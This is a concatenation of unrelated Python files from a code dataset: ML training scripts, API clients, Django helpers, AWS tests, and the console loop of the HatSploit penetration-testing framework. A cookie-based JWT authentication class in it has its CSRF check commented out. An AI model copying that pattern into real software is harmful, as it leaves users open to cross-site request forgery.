result.append([trackCars[i], place, timeVal])
print(result)
return result
#-----------------
if __name__ == '__main__':
if initSerial():
while True:
parseSerial(["42", "32", "12", "1"])
| StarcoderdataPython |
73800 | # coding: utf8
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import pprint
import cv2
import argparse
import numpy as np
import paddle.fluid as fluid
from utils.config import cfg
from models.model_builder import build_model
from models.model_builder import ModelPhase
def parse_args():
parser = argparse.ArgumentParser(
description='PaddleSeg Inference Model Exporter')
parser.add_argument(
'--cfg',
dest='cfg_file',
help='Config file for training (and optionally testing)',
default=None,
type=str)
parser.add_argument(
'opts',
help='See utils/config.py for all options',
default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def export_inference_config():
deploy_cfg = '''DEPLOY:
USE_GPU : 1
USE_PR : 0
MODEL_PATH : "%s"
MODEL_FILENAME : "%s"
PARAMS_FILENAME : "%s"
EVAL_CROP_SIZE : %s
MEAN : %s
STD : %s
IMAGE_TYPE : "%s"
NUM_CLASSES : %d
CHANNELS : %d
PRE_PROCESSOR : "SegPreProcessor"
PREDICTOR_MODE : "ANALYSIS"
BATCH_SIZE : 1
''' % (cfg.FREEZE.SAVE_DIR, cfg.FREEZE.MODEL_FILENAME,
cfg.FREEZE.PARAMS_FILENAME, cfg.EVAL_CROP_SIZE, cfg.MEAN, cfg.STD,
cfg.DATASET.IMAGE_TYPE, cfg.DATASET.NUM_CLASSES, len(cfg.STD))
if not os.path.exists(cfg.FREEZE.SAVE_DIR):
os.mkdir(cfg.FREEZE.SAVE_DIR)
yaml_path = os.path.join(cfg.FREEZE.SAVE_DIR, 'deploy.yaml')
with open(yaml_path, "w") as fp:
fp.write(deploy_cfg)
return yaml_path
def export_inference_model(args):
"""
Export PaddlePaddle inference model for prediction depolyment and serving.
"""
print("Exporting inference model...")
startup_prog = fluid.Program()
infer_prog = fluid.Program()
image, logit_out = build_model(
infer_prog, startup_prog, phase=ModelPhase.PREDICT)
# Use CPU for exporting inference model instead of GPU
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_prog)
infer_prog = infer_prog.clone(for_test=True)
if os.path.exists(cfg.TEST.TEST_MODEL):
print('load test model:', cfg.TEST.TEST_MODEL)
try:
fluid.load(infer_prog, os.path.join(cfg.TEST.TEST_MODEL, 'model'),
exe)
except:
fluid.io.load_params(
exe, cfg.TEST.TEST_MODEL, main_program=infer_prog)
else:
print("TEST.TEST_MODEL diretory is empty!")
exit(-1)
fluid.io.save_inference_model(
cfg.FREEZE.SAVE_DIR,
feeded_var_names=[image.name],
target_vars=[logit_out],
executor=exe,
main_program=infer_prog,
model_filename=cfg.FREEZE.MODEL_FILENAME,
params_filename=cfg.FREEZE.PARAMS_FILENAME)
print("Inference model exported!")
print("Exporting inference model config...")
deploy_cfg_path = export_inference_config()
print("Inference model saved : [%s]" % (deploy_cfg_path))
def main():
args = parse_args()
if args.cfg_file is not None:
cfg.update_from_file(args.cfg_file)
if args.opts:
cfg.update_from_list(args.opts)
cfg.check_and_infer()
print(pprint.pformat(cfg))
export_inference_model(args)
if __name__ == '__main__':
main()
| StarcoderdataPython |
101343 | import sys
input = sys.stdin.readline
sys.setrecursionlimit(10 ** 7)
s = []
for v in input().strip():
if v != 'B':
s.append(v)
else:
if s:
s.pop()
print(''.join(s))
| StarcoderdataPython |
3209515 | <gh_stars>0
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
__all__ = ['addition', 'multiply']
# Cell
from fastcore.all import *
from typing import Union
# Cell
from typing import Union
def addition(a:Union[int, float], b:Union[int, float]) -> Union[int, float]:
"""
A simple addition function. Add `a` to `b`.
"""
calc = a + b
return calc
# Cell
def multiply(a : float, b: float) -> float:
"""
fn multiplies two values `a` and `b`
"""
return a*b | StarcoderdataPython |
166885 | import requests
from exceptions import RequestError
from log import Log
from .ladder import Ladder
from .player import Player
class API:
@staticmethod
def get_current_season_id(params: dict) -> int:
r = requests.get("https://us.api.battle.net/data/sc2/season/current", params)
if r.status_code != 200:
raise RequestError(r, "{} returned error code {}, exiting...".format(r.url, r.status_code))
return r.json()["id"]
@staticmethod
def get_all_ladders(region_code: str, max_league_id: int, season_id: int, params: dict) -> """List of ladders""":
ladders = []
for league_id in range(max_league_id + 1):
try:
r = requests.get("https://{}.api.battle.net/data/sc2/league/{}/201/0/{}".format(region_code, season_id,
league_id), params)
if r.status_code != 200:
raise RequestError(r, "{} returned error code {}, skipping...".format(r.url, r.status_code))
Log.write_log_message("League {} Status: {}".format(league_id, r.status_code))
json = r.json()
for tier in json["tier"]:
division = tier["id"] + 1
min_mmr = tier["min_rating"]
max_mmr = tier["max_rating"]
for ladder in tier["division"]:
ladder_id = ladder["ladder_id"]
obj = Ladder(region_code, ladder_id, league_id, division, min_mmr, max_mmr)
ladders.append(obj)
except RequestError as e:
Log.write_log_message(e.__str__(), True)
return ladders
@staticmethod
def get_players_in_ladder(region_code: str, ladder: Ladder, params: dict) -> """List of players""":
players = []
r = requests.get("https://{}.api.battle.net/data/sc2/ladder/{}".format(region_code, ladder.id), params)
if r.status_code != 200:
raise RequestError(r, "{} returned error code {}, skipping...".format(r.url, r.status_code))
json = r.json()
for player in json["team"]:
try:
bnet = player["member"][0]["character_link"]["battle_tag"]
mmr = player["rating"]
games_played = player["member"][0]["played_race_count"][0]["count"]
race = player["member"][0]["played_race_count"][0]["race"]
found_player = False
for p_obj in players:
if p_obj.battletag == bnet:
p_obj.add_race(race, ladder.league_id, ladder.division, games_played, mmr)
found_player = True
if not found_player:
obj = Player(bnet, region_code)
# ladder.division + 1 is due to API having d1 be 0, d2 be 1, etc.
obj.add_race(race, ladder.league_id, ladder.division, games_played, mmr)
players.append(obj)
except KeyError:
continue
return players
| StarcoderdataPython |
1787511 | import asyncio
import logging
from functools import wraps
import inspect
from typing import (
Any,
Awaitable,
Callable,
NamedTuple,
Tuple,
Type,
TypeVar,
Union,
cast,
)
_T = TypeVar("_T")
_log = logging.getLogger(__name__)
async def _noop(*args, **kwargs):
pass
def retryableasyncmethod(
types: Tuple[Type[BaseException], ...],
*,
max_attempts: Union[int, str],
wait_timeout: Union[float, str],
lock: Union[asyncio.Lock, str] = None,
on_retry: Union[Callable[[BaseException], Awaitable], str] = None,
):
"""
Decorator to wrap an async method and make it retryable.
"""
def make_retryable(func: _T) -> _T:
if inspect.isasyncgenfunction(func):
raise TypeError("Async generator functions are not supported")
f: Any = cast(Any, func)
@wraps(f)
async def async_retryable_decorator(self, *args, **kwargs):
last_exc = None
retry = _noop
if isinstance(on_retry, str):
retry = getattr(self, on_retry)
elif callable(on_retry):
retry = on_retry
attempts: int
if isinstance(max_attempts, str):
attempts = getattr(self, max_attempts)
else:
attempts = max_attempts
timeout: float
if isinstance(wait_timeout, str):
timeout = getattr(self, wait_timeout)
else:
timeout = wait_timeout
retry_lock = None
if isinstance(lock, str):
retry_lock = getattr(self, lock)
elif lock is not None:
retry_lock = lock
# Use an exponential backoff, starting with 1s
# and with a maximum of whatever was configured
current_wait_timeout = min(1, timeout)
for attempt in range(1, attempts + 1):
try:
return await f(self, *args, **kwargs)
except types as exc:
_log.error("Attempt %r/%r failed", attempt, attempts, exc_info=exc)
last_exc = exc
_log.debug("Waiting %.2fs before next attempt", current_wait_timeout)
await asyncio.sleep(current_wait_timeout)
current_wait_timeout = min(current_wait_timeout * 2, timeout)
if retry_lock is not None:
if retry_lock.locked():
_log.debug("Already retrying, possibly on another method")
else:
async with retry_lock:
_log.debug("Calling retry method")
await retry(last_exc)
else:
await retry(last_exc)
if last_exc is None:
last_exc = Exception("All %r attempts failed" % attempts)
raise last_exc
return cast(_T, async_retryable_decorator)
return make_retryable
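# Example usage (illustrative sketch, not part of the original module). The string
# arguments are attribute names resolved on the instance at call time, exactly as the
# decorator above does with getattr(); the Client class below is hypothetical:
#
#     class Client:
#         def __init__(self):
#             self.max_attempts = 3
#             self.wait_timeout = 10.0
#             self._retry_lock = asyncio.Lock()
#
#         async def _reconnect(self, exc: BaseException) -> None:
#             ...  # re-establish the connection before the next attempt
#
#         @retryableasyncmethod(
#             (ConnectionError, TimeoutError),
#             max_attempts="max_attempts",
#             wait_timeout="wait_timeout",
#             lock="_retry_lock",
#             on_retry="_reconnect",
#         )
#         async def fetch(self, url: str) -> bytes:
#             ...  # the operation that may fail transiently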
| StarcoderdataPython |
136852 | <filename>projeto-01/measure.py
from subprocess import run
from os import path, makedirs
import csv
if not path.exists("./sort"):
run(["make", "build"])
makedirs(path.join(path.curdir, "data"), exist_ok=True)
for sort_method in ("merge", "heap", "bubble"):
with open(path.join(path.curdir, "data", f"{sort_method}_sort.csv"), "w", newline="") as csv_file:
csv_writer = csv.writer(csv_file, delimiter=";")
csv_writer.writerow(["case", "method", "entries", "time(s)", "memory(kb)"])
for sort_case in ("best", "random", "worst"):
for entries in (
(1e4, 1e5, 1e6) if sort_method == "bubble" and sort_case != "best" else (1e4, 1e5, 1e6, 1e7, 1e8, 1e9)
):
run(["./memusg.py", "./sort", sort_method, sort_case, "{:.0f}".format(entries)])
| StarcoderdataPython |
3223109 | <reponame>dpouris/chore-battle<gh_stars>1-10
from rest_framework_simplejwt.authentication import JWTAuthentication
from django.conf import settings
from rest_framework.authentication import CSRFCheck
from rest_framework import exceptions
def enforce_csrf(request):
"""
Enforce CSRF validation.
"""
check = CSRFCheck()
# populates request.META['CSRF_COOKIE'], which is used in process_view()
check.process_request(request)
reason = check.process_view(request, None, (), {})
if reason:
# CSRF failed, bail with explicit error message
raise exceptions.PermissionDenied('CSRF Failed: %s' % reason)
class CustomAuthentication(JWTAuthentication):
def authenticate(self, request):
header = self.get_header(request)
if header is None:
raw_token = request.COOKIES.get(settings.SIMPLE_JWT['AUTH_COOKIE']) or None
else:
raw_token = self.get_raw_token(header)
if raw_token is None:
return None
validated_token = self.get_validated_token(raw_token)
# enforce_csrf(request)
return self.get_user(validated_token), validated_token | StarcoderdataPython |
169018 | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the InternetGateway API.
"""
import boto3
import pytest
import time
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource
from e2e.replacement_values import REPLACEMENT_VALUES
RESOURCE_PLURAL = "internetgateways"
CREATE_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
@pytest.fixture(scope="module")
def ec2_client():
return boto3.client("ec2")
def get_internet_gateway(ec2_client, ig_id: str) -> dict:
try:
resp = ec2_client.describe_internet_gateways(
Filters=[{"Name": "internet-gateway-id", "Values": [ig_id]}]
)
except Exception as e:
logging.debug(e)
return None
if len(resp["InternetGateways"]) == 0:
return None
return resp["InternetGateways"][0]
def internet_gateway_exists(ec2_client, ig_id: str) -> bool:
return get_internet_gateway(ec2_client, ig_id) is not None
@service_marker
@pytest.mark.canary
class TestInternetGateway:
def test_create_delete(self, ec2_client):
resource_name = random_suffix_name("ig-ack-test", 24)
replacements = REPLACEMENT_VALUES.copy()
replacements["INTERNET_GATEWAY_NAME"] = resource_name
# Load Internet Gateway CR
resource_data = load_ec2_resource(
"internet_gateway",
additional_replacements=replacements,
)
logging.debug(resource_data)
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
resource = k8s.get_resource(ref)
resource_id = resource["status"]["internetGatewayID"]
time.sleep(CREATE_WAIT_AFTER_SECONDS)
# Check Internet Gateway exists
exists = internet_gateway_exists(ec2_client, resource_id)
assert exists
# Delete k8s resource
_, deleted = k8s.delete_custom_resource(ref, 2, 5)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
# Check Internet Gateway doesn't exist
exists = internet_gateway_exists(ec2_client, resource_id)
assert not exists | StarcoderdataPython |
1720983 | <filename>Controllers/Utilities.py
from flask import jsonify
from flask_restful import Resource
# Authentication #
from Other.Authentication import require_auth
from Other.SharedResources import g_user
class ValidateIP(Resource):
def get(self):
return jsonify({"answer":"True"})
class ValidateLogin(Resource):
method_decorators = [require_auth]
def get(self):
return jsonify({"answer":"True",
"phoneNumber":g_user.userObj["PHONENUMBER"]}) | StarcoderdataPython |
3229023 | <filename>users/management/commands/dispensary_import.py<gh_stars>1-10
import datetime
from django.core.management.base import BaseCommand
from openpyxl import load_workbook
import clients.models as clients
class Command(BaseCommand):
def add_arguments(self, parser):
"""
        :param path - file with patient cards + dispensary registration diagnosis
"""
parser.add_argument('path', type=str)
def handle(self, *args, **kwargs):
fp = kwargs["path"]
self.stdout.write("Path: " + fp)
wb = load_workbook(filename=fp)
ws = wb[wb.sheetnames[0]]
starts = False
for row in ws.rows:
cells = [str(x.value) for x in row]
if not starts:
if "карта" in cells and "диагноз" in cells and "дата1" in cells:
starts = True
num_card = cells.index("карта")
diag = cells.index("диагноз")
date_start = cells.index("дата1")
else:
if clients.Card.objects.filter(number_poliklinika=cells[num_card]).exists():
card = clients.Card.objects.filter(number_poliklinika=cells[num_card]).first()
day_start = datetime.datetime.strptime(cells[date_start], "%Y-%m-%d %H:%M:%S").date()
clients.DispensaryReg.objects.update_or_create(card=card, diagnos=cells[diag], defaults={'date_start': day_start})
                    print('added/updated dispensary registration: \n')  # noqa: T001
                    print(card, 'Diagnosis : date of registration: ', cells[diag], day_start)  # noqa: T001
| StarcoderdataPython |
1676743 | <reponame>adolabsnet/HatSploit
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
import sys
import readline
from core.base.io import io
from core.util.tip import tip
from core.base.jobs import jobs
from core.base.execute import execute
from core.base.loader import loader
from core.base.config import config
from core.cli.badges import badges
from core.util.banner import banner
from core.cli.colors import colors
from core.base.storage import local_storage
from core.modules.modules import modules
from core.base.exceptions import exceptions
class console:
def __init__(self):
self.io = io()
self.tip = tip()
self.jobs = jobs()
self.execute = execute()
self.loader = loader()
self.config = config()
self.badges = badges()
self.banner = banner()
self.colors = colors()
self.local_storage = local_storage()
self.modules = modules()
self.exceptions = exceptions()
self.history = self.config.path_config['base_paths']['history_path']
def check_root(self):
if os.getuid() == 0:
return True
self.badges.output_error("Operation not permitted!")
return False
def check_install(self):
if os.path.exists(self.config.path_config['base_paths']['root_path']):
return True
self.badges.output_error("HatSploit is not installed!")
self.badges.output_information("Consider running ./install.sh")
return False
def start_hsf(self):
try:
self.loader.load_all()
except Exception:
sys.exit(1)
def launch_menu(self):
while True:
try:
if not self.modules.check_current_module():
prompt = '(hsf)> '
else:
module = self.modules.get_current_module_name()
name = self.modules.get_current_module_object().details['Name']
prompt = '(hsf: ' + self.modules.get_category(module) + ': ' + self.colors.RED + name + self.colors.END + ')> '
commands, arguments = self.io.input(prompt)
self.jobs.stop_dead()
self.execute.execute_command(commands, arguments)
if self.local_storage.get("history"):
readline.write_history_file(self.history)
except (KeyboardInterrupt, EOFError, self.exceptions.GlobalException):
pass
except Exception as e:
self.badges.output_error("An error occurred: " + str(e) + "!")
def enable_history_file(self):
if not os.path.exists(self.history):
open(self.history, 'w').close()
readline.read_history_file(self.history)
def launch_shell(self):
using_history = self.local_storage.get("history")
if using_history:
self.enable_history_file()
readline.parse_and_bind("tab: complete")
version = self.config.core_config['details']['version']
codename = self.config.core_config['details']['codename']
if self.config.core_config['console']['clear']:
self.badges.output_empty(self.colors.CLEAR, end='')
if self.config.core_config['console']['banner']:
self.banner.print_random_banner()
if self.config.core_config['console']['header']:
plugins = self.local_storage.get("plugins")
modules = self.local_storage.get("modules")
plugins_total = 0
modules_total = 0
if plugins:
for database in plugins.keys():
plugins_total += len(plugins[database])
if modules:
for database in modules.keys():
for module_category in modules[database].keys():
for module_platform in modules[database][module_category].keys():
modules_total += len(modules[database][module_category][module_platform])
header = ""
header += f"{self.colors.END}\n"
if codename and not codename.isspace():
header += f" --=( {self.colors.YELLOW}HatSploit Framework {codename} {version}{self.colors.END}\n"
else:
header += f" --=( {self.colors.YELLOW}HatSploit Framework {version}{self.colors.END}\n"
header += f"--==--=( Developed by EntySec ({self.colors.LINE}https://entysec.netlify.app/{self.colors.END})\n"
header += f" --=( {modules_total} modules loaded | {plugins_total} plugins available\n"
header += f"{self.colors.END}"
self.badges.output_empty(header)
if self.config.core_config['console']['tip']:
self.tip.print_random_tip()
self.badges.output_empty("")
def shell(self):
self.start_hsf()
self.launch_shell()
self.launch_menu()
| StarcoderdataPython |
1699562 | from typing import List, Optional
from pydantic import Field, BaseModel
from tottle.types.objects.alert import ProximityAlertTriggered
from tottle.types.objects.animation import Animation
from tottle.types.objects.audio import Audio
from tottle.types.objects.chat import Chat
from tottle.types.objects.contact import Contact
from tottle.types.objects.dice import Dice
from tottle.types.objects.entity import Entity
from tottle.types.objects.game import Game
from tottle.types.objects.invoice import Invoice
from tottle.types.objects.keyboard import InlineKeyboardMarkup
from tottle.types.objects.location import Location
from tottle.types.objects.passport import PassportData
from tottle.types.objects.payment import SuccessfulPayment
from tottle.types.objects.photo import PhotoSize
from tottle.types.objects.poll import Poll
from tottle.types.objects.sticker import Sticker
from tottle.types.objects.user import User
from tottle.types.objects.venue import Venue
from tottle.types.objects.video import Video, VideoNote
class Message(BaseModel):
chat: Optional["Chat"] = None
date: Optional[int] = None
message_id: Optional[int] = None
from_user: Optional["User"] = Field(alias="from")
forward_from: Optional["User"] = None
forward_from_chat: Optional["Chat"] = None
forward_from_message_id: Optional[int] = None
forward_signature: Optional[str] = None
forward_sender_name: Optional[str] = None
forward_date: Optional[int] = None
reply_to_message: Optional["Message"] = None
via_bot: Optional["User"] = None
edit_date: Optional[int] = None
media_group_id: Optional[str] = None
author_signature: Optional[str] = None
text: Optional[str] = None
entities: Optional[List["Entity"]] = None
animation: Optional["Animation"] = None
audio: Optional["Audio"] = None
photo: Optional[List["PhotoSize"]] = None
sticker: Optional["Sticker"] = None
video: Optional["Video"] = None
video_note: Optional["VideoNote"] = None
caption: Optional[str] = None
caption_entities: Optional[List["Entity"]] = None
contact: Optional["Contact"] = None
dice: Optional["Dice"] = None
game: Optional["Game"] = None
poll: Optional["Poll"] = None
venue: Optional["Venue"] = None
location: Optional["Location"] = None
new_chat_members: Optional[List["User"]] = None
new_chat_title: Optional[str] = None
new_chat_photo: Optional[List["PhotoSize"]] = None
delete_chat_photo: Optional[bool] = None
group_chat_created: Optional[bool] = None
supergroup_chat_created: Optional[bool] = None
channel_chat_created: Optional[bool] = None
migrate_to_chat_id: Optional[int] = None
migrate_from_chat_id: Optional[int] = None
pinned_message: Optional["Message"] = None
invoice: Optional["Invoice"] = None
successful_payment: Optional["SuccessfulPayment"] = None
connected_website: Optional[str] = None
passport_data: Optional["PassportData"] = None
proximity_alert_triggered: Optional["ProximityAlertTriggered"] = None
reply_markup: Optional["InlineKeyboardMarkup"] = None
Message.update_forward_refs()
| StarcoderdataPython |
3201699 | <reponame>Hickey3197/educoder<filename>Handwritten_digit_recognition/Handwritten.py
import numpy
import scipy.special
import matplotlib.pyplot
import imageio
import glob
# neural network class definition
class neuralNetwork:
    # initialise the neural network
    def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate):
        # set the number of nodes in each input, hidden and output layer
        self.inodes = inputnodes
        self.hnodes = hiddennodes
        self.onodes = outputnodes
        # link weight matrices, wih and who
        # weights inside the arrays are w_i_j, where the link is from node i to node j in the next layer
        # w11 w21
        # w12 w22 etc
        self.wih = numpy.random.normal(0.0, pow(self.inodes, -0.5), (self.hnodes, self.inodes))
        self.who = numpy.random.normal(0.0, pow(self.hnodes, -0.5), (self.onodes, self.hnodes))
        # learning rate
        self.lr = learningrate
        # the activation function is the sigmoid function
        self.activation_function = lambda x: scipy.special.expit(x)
        pass
    # train the neural network
    def train(self, inputs_list, targets_list):
        # convert the inputs list to a 2d array
        inputs = numpy.array(inputs_list, ndmin=2).T
        targets = numpy.array(targets_list, ndmin=2).T
        # calculate signals into the hidden layer
        hidden_inputs = numpy.dot(self.wih, inputs)
        # calculate the signals emerging from the hidden layer
        hidden_outputs = self.activation_function(hidden_inputs)
        # calculate signals into the final output layer
        final_inputs = numpy.dot(self.who, hidden_outputs)
        # calculate the signals emerging from the final output layer
        final_outputs = self.activation_function(final_inputs)
        # output layer error is (target - actual)
        output_errors = targets - final_outputs
        # hidden layer error is the output_errors, split by the weights, recombined at the hidden nodes
        hidden_errors = numpy.dot(self.who.T, output_errors)
        # update the weights for the links between the hidden and output layers
        self.who += self.lr * numpy.dot((output_errors * final_outputs * (1.0 - final_outputs)),
                                        numpy.transpose(hidden_outputs))
        # update the weights for the links between the input and hidden layers
        self.wih += self.lr * numpy.dot((hidden_errors * hidden_outputs * (1.0 - hidden_outputs)),
                                        numpy.transpose(inputs))
        pass
# 查询神经网络
def query(self, inputs_list):
        # Convert the inputs list to a 2D array
inputs = numpy.array(inputs_list, ndmin=2).T
        # Calculate signals into the hidden layer
hidden_inputs = numpy.dot(self.wih, inputs)
        # Calculate the signals emerging from the hidden layer
hidden_outputs = self.activation_function(hidden_inputs)
        # Calculate signals into the final output layer
final_inputs = numpy.dot(self.who, hidden_outputs)
        # Calculate the signals emerging from the final output layer
final_outputs = self.activation_function(final_inputs)
return final_outputs
# Number of input, hidden and output nodes
input_nodes = 784
hidden_nodes = 200
output_nodes = 10
# Learning rate
learning_rate = 0.1
# Create an instance of the neural network
n = neuralNetwork(input_nodes,hidden_nodes,output_nodes, learning_rate)
# Load the MNIST training data CSV file into a list
training_data_file = open("MNIST_data/mnist_train.csv", 'r')
training_data_list = training_data_file.readlines()
training_data_file.close()
# Train the neural network
# epochs is the number of times the training data set is used for training
epochs = 10
for e in range(epochs):
    # Go through all records in the training data set
for record in training_data_list:
        # Split the record by the commas
all_values = record.split(',')
        # Scale and shift the inputs
inputs = (numpy.asfarray(all_values[1:]) / 255.0 * 0.99) + 0.01
        # Create the target output values (all 0.01, except the desired label which is 0.99)
targets = numpy.zeros(output_nodes) + 0.01
        # all_values[0] is the target label for this record
targets[int(all_values[0])] = 0.99
n.train(inputs, targets)
pass
pass
# Test the neural network
# Load the MNIST test data CSV file into a list
test_data_file = open("MNIST_data/mnist_test.csv", 'r')
test_data_list = test_data_file.readlines()
test_data_file.close()
# Scorecard of how well the network performs, initially empty
scorecard = []
# Go through all the records in the test data set
for record in test_data_list:
all_values = record.split(',')
    # The correct answer is the first value
correct_label = int(all_values[0])
    # Scale and shift the inputs
inputs = (numpy.asfarray(all_values[1:]) / 255.0 * 0.99) + 0.01
    # Query the network
outputs = n.query(inputs)
    # The index of the highest value corresponds to the label
label = numpy.argmax(outputs)
# print("Answer label is:",correct_label," ; ",label," is network's answer")
    # Check whether the answer is correct
if (label == correct_label):
        # The network's answer matches the correct answer; append 1 to the scorecard
scorecard.append(1)
else:
scorecard.append(0)
pass
# Calculate the accuracy score
scorecard_array = numpy.asarray(scorecard)
print("准确率为:", scorecard_array.sum() / scorecard_array.size)
# Test data set made from our own handwritten images
our_own_dataset = []
# Load the PNG image data as the test data set
for image_file_name in glob.glob('Number4.png'):
    # Use the file name to set the correct label
label = int(image_file_name[-5:-4])
    # Convert the PNG image file into an array
    print("Loading file:", image_file_name)
img_array = imageio.imread(image_file_name, as_gray=True)
    # Each image is a 28x28 matrix, i.e. a 784-element vector (28*28 = 784)
    # The values are subtracted from 255.0: conventionally 0 means black and 255 means white, but MNIST uses the opposite convention, so the values are inverted to match the MNIST data
    # Reshape from 28x28 into a list of 784 values, inverting them
img_data = 255.0 - img_array.reshape(784)
    # Then scale the data to the range 0.01 to 1.0
img_data = (img_data / 255.0 * 0.99) + 0.01
print(numpy.min(img_data))
print(numpy.max(img_data))
    # Append the label and image data to the test data set
record = numpy.append(label, img_data)
our_own_dataset.append(record)
pass
# Test the neural network with our own images
# Which record to test
item = 0
# plot image
matplotlib.pyplot.imshow(our_own_dataset[item][1:].reshape(28,28), cmap='Greys', interpolation='None')
# The correct answer is the first value
correct_label = our_own_dataset[item][0]
# The data is the remaining values
inputs = our_own_dataset[item][1:]
# Query the network
outputs = n.query(inputs)
print (outputs)
# The index of the highest value corresponds to the label
label = numpy.argmax(outputs)
print("神经网络测试结果:", label)
# Check whether the answer is correct
if (label == correct_label):
print ("match!")
else:
print ("no match!")
pass
| StarcoderdataPython |
58896 | <filename>SNIC/data.py
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("snic-provincias.csv")
print(df.head())
print(df.columns)
print(df.anio.describe())
plt.plot(df.anio, df.cantidad_hechos)
plt.show() | StarcoderdataPython |
1693869 | <reponame>HarshShah03325/Emotion_Recognition
import model
import json
from util import VolumeDataGenerator
def train_model(steps_per_epoch, n_epochs, validation_steps):
'''
trains a 3D Unet for give parameters:
steps_per_epoch
n_epochs
validation_steps
The function uses train generator and valid generator for model.fit_generator() method.
'''
base_dir = 'BraTS-Data/processed/'
with open("config.json") as json_file:
config = json.load(json_file)
# Get generators for training and validation sets
train_generator = VolumeDataGenerator(config["train"], base_dir + "train/", batch_size=3, dim=(160, 160, 16), verbose=1)
valid_generator = VolumeDataGenerator(config["valid"], base_dir + "valid/", batch_size=3, dim=(160, 160, 16), verbose=1)
trained_model = model.Unet()
trained_model.fit_generator(generator=train_generator,
steps_per_epoch=steps_per_epoch,
epochs=n_epochs,
use_multiprocessing=False,
validation_data=valid_generator,
validation_steps=validation_steps)
return trained_model
def save_model(steps_per_epoch=2, n_epochs=1, validation_steps=2):
'''
Save weights of a model trained for given parameters:
steps_per_epoch
n_epochs
validation_steps
'''
model = train_model(steps_per_epoch, n_epochs,validation_steps)
model.save_weights('pretrained_model.hdf5')
save_model() | StarcoderdataPython |
1754860 | <gh_stars>0
# coding: utf-8
"""dynamic_raw_id filters."""
from django import forms
from django.contrib import admin
from dynamic_raw_id.widgets import DynamicRawIDWidget
class DynamicRawIDFilterForm(forms.Form):
"""Form for dynamic_raw_id filter."""
def __init__(self, rel, admin_site, field_name, **kwargs):
"""Construct field for given field rel."""
super(DynamicRawIDFilterForm, self).__init__(**kwargs)
self.fields["%s" % field_name] = forms.IntegerField(
label="",
widget=DynamicRawIDWidget(rel=rel, admin_site=admin_site),
required=False,
)
class DynamicRawIDFilter(admin.filters.FieldListFilter):
"""Filter list queryset by primary key of related object."""
template = "dynamic_raw_id/admin/filters/dynamic_raw_id_filter.html"
def __init__(self, field, request, params, model, model_admin, field_path):
"""Use GET param for lookup and form initialization."""
self.lookup_kwarg = "%s" % field_path
super(DynamicRawIDFilter, self).__init__(
field, request, params, model, model_admin, field_path
)
rel = field.remote_field
self.form = self.get_form(request, rel, model_admin.admin_site)
def choices(self, cl):
"""Filter choices are not available."""
return []
def expected_parameters(self):
"""Return GET params for this filter."""
return [self.lookup_kwarg]
def get_form(self, request, rel, admin_site):
"""Return filter form."""
return DynamicRawIDFilterForm(
admin_site=admin_site,
rel=rel,
field_name=self.field_path,
data=self.used_parameters,
)
def queryset(self, request, queryset):
"""Filter queryset using params from the form."""
if self.form.is_valid():
# get no null params
filter_params = dict(
filter(lambda x: bool(x[1]), self.form.cleaned_data.items())
)
return queryset.filter(**filter_params)
return queryset
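# Usage sketch: a FieldListFilter subclass is attached per field in a ModelAdmin's
# list_filter. The Ticket model and "assigned_to" field below are hypothetical.
#
# from django.contrib import admin
# from dynamic_raw_id.filters import DynamicRawIDFilter
#
# @admin.register(Ticket)
# class TicketAdmin(admin.ModelAdmin):
#     list_filter = (
#         ("assigned_to", DynamicRawIDFilter),  # raw-id lookup on the related object's pk
#     )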
| StarcoderdataPython |
1750074 | <filename>events/forms.py
from django.utils.safestring import mark_safe
from django import forms
from django.forms.widgets import TextInput, Media
from django.core.validators import validate_email
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
